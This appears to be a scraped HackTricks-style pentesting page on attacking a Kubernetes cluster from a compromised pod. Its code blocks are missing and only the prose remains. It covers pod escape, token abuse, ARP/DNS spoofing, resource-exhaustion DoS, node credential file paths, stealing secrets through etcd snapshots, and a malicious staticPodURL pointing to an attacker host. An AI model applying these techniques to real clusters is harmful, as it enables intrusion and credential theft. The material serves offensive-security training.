Attacking Kubernetes from inside a Pod
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
If you are lucky enough you may be able to escape from it to the node:
In order to try to escape from the pods you might need to escalate privileges first, some techniques to do it:
You can check this docker breakouts to try to escape from a pod you have compromised:
As explained in the section about kubernetes enumeration:
Kubernetes EnumerationUsually the pods are run with a service account token inside of them. This service account may have some privileges attached to it that you could abuse to move to other pods or even to escape to the nodes configured inside the cluster. Check how in:
Abusing Roles/ClusterRoles in KubernetesIf the pod is run inside a cloud environment you might be able to leak a token from the metadata endpoint and escalate privileges using it.
As you are inside the Kubernetes environment, if you cannot escalate privileges abusing the current pods privileges and you cannot escape from the container, you should search potential vulnerable services.
For this purpose, you can try to get all the services of the kubernetes environment:
By default, Kubernetes uses a flat networking schema, which means any pod/service within the cluster can talk to other. The namespaces within the cluster don't have any network security restrictions by default. Anyone in the namespace can talk to other namespaces.
The following Bash script (taken from a Kubernetes workshop) will install and scan the IP ranges of the kubernetes cluster:
Check out the following page to learn how you could attack Kubernetes specific services to compromise other pods/all the environment:
Pentesting Kubernetes ServicesIn case the compromised pod is running some sensitive service where other pods need to authenticate you might be able to obtain the credentials send from the other pods sniffing local communications.
By default techniques like ARP spoofing (and thanks to that DNS Spoofing) work in kubernetes network. Then, inside a pod, if you have the NET_RAW capability (which is there by default), you will be able to send custom crafted network packets and perform MitM attacks via ARP Spoofing to all the pods running in the same node. Moreover, if the malicious pod is running in the same node as the DNS Server, you will be able to perform a DNS Spoofing attack to all the pods in cluster.
Kubernetes Network AttacksThere is no specification of resources in the Kubernetes manifests and not applied limit ranges for the containers. As an attacker, we can consume all the resources where the pod/deployment running and starve other resources and cause a DoS for the environment.
This can be done with a tool such as stress-ng:
You can see the difference between while running stress-ng
and after
If you managed to escape from the container there are some interesting things you will find in the node:
The Container Runtime process (Docker)
More pods/containers running in the node you can abuse like this one (more tokens)
The whole filesystem and OS in general
The Kube-Proxy service listening
The Kubelet service listening. Check config files:
Directory: /var/lib/kubelet/
/var/lib/kubelet/kubeconfig
/var/lib/kubelet/kubelet.conf
/var/lib/kubelet/config.yaml
/var/lib/kubelet/kubeadm-flags.env
/etc/kubernetes/kubelet-kubeconfig
Other kubernetes common files:
$HOME/.kube/config
- User Config
/etc/kubernetes/kubelet.conf
- Regular Config
/etc/kubernetes/bootstrap-kubelet.conf
- Bootstrap Config
/etc/kubernetes/manifests/etcd.yaml
- etcd Configuration
/etc/kubernetes/pki
- Kubernetes Key
If you cannot find the kubeconfig file in one of the previously commented paths, check the argument --kubeconfig
of the kubelet process:
The script can-they.sh will automatically get the tokens of other pods and check if they have the permission you are looking for (instead of you looking 1 by 1):
A DaemonSet is a pod that will be run in all the nodes of the cluster. Therefore, if a DaemonSet is configured with a privileged service account, in ALL the nodes you are going to be able to find the token of that privileged service account that you could abuse.
The exploit is the same one as in the previous section, but you now don't depend on luck.
If the cluster is managed by a cloud service, usually the Node will have a different access to the metadata endpoint than the Pod. Therefore, try to access the metadata endpoint from the node (or from a pod with hostNetwork to True):
Kubernetes Pivoting to CloudsIf you can specify the nodeName of the Node that will run the container, get a shell inside a control-plane node and get the etcd database:
control-plane nodes have the role master and in cloud managed clusters you won't be able to run anything in them.
If you can run your pod on a control-plane node using the nodeName
selector in the pod spec, you might have easy access to the etcd
database, which contains all of the configuration for the cluster, including all secrets.
Below is a quick and dirty way to grab secrets from etcd
if it is running on the control-plane node you are on. If you want a more elegant solution that spins up a pod with the etcd
client utility etcdctl
and uses the control-plane node's credentials to connect to etcd wherever it is running, check out this example manifest from @mauilion.
Check to see if etcd
is running on the control-plane node and see where the database is (This is on a kubeadm
created cluster)
Output:
View the data in etcd database:
Extract the tokens from the database and show the service account name
Same command, but some greps to only return the default token in the kube-system namespace
Output:
Create a snapshot of the etcd
database. Check this script for further info.
Transfer the etcd
snapshot out of the node in your favourite way.
Unpack the database:
Start etcd
on your local machine and make it use the stolen snapshot:
List all the secrets:
Get the secfrets:
Static Pods are managed directly by the kubelet daemon on a specific node, without the API server observing them. Unlike Pods that are managed by the control plane (for example, a Deployment); instead, the kubelet watches each static Pod (and restarts it if it fails).
Therefore, static Pods are always bound to one Kubelet on a specific node.
The kubelet automatically tries to create a mirror Pod on the Kubernetes API server for each static Pod. This means that the Pods running on a node are visible on the API server, but cannot be controlled from there. The Pod names will be suffixed with the node hostname with a leading hyphen.
The spec
of a static Pod cannot refer to other API objects (e.g., ServiceAccount, ConfigMap, Secret, etc. So you cannot abuse this behaviour to launch a pod with an arbitrary serviceAccount in the current node to compromise the cluster. But you could use this to run pods in different namespaces (in case thats useful for some reason).
If you are inside the node host you can make it create a static pod inside itself. This is pretty useful because it might allow you to create a pod in a different namespace like kube-system.
In order to create a static pod, the docs are a great help. You basically need 2 things:
Configure the param --pod-manifest-path=/etc/kubernetes/manifests
in the kubelet service, or in the kubelet config (staticPodPath) and restart the service
Create the definition on the pod definition in /etc/kubernetes/manifests
Another more stealth way would be to:
Modify the param staticPodURL
from kubelet config file and set something like staticPodURL: http://attacker.com:8765/pod.yaml
. This will make the kubelet process create a static pod getting the configuration from the indicated URL.
Example of pod configuration to create a privilege pod in kube-system taken from here:
If an attacker has compromised a node and he can delete pods from other nodes and make other nodes not able to execute pods, the pods will be rerun in the compromised node and he will be able to steal the tokens run in them. For more info follow this links.
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)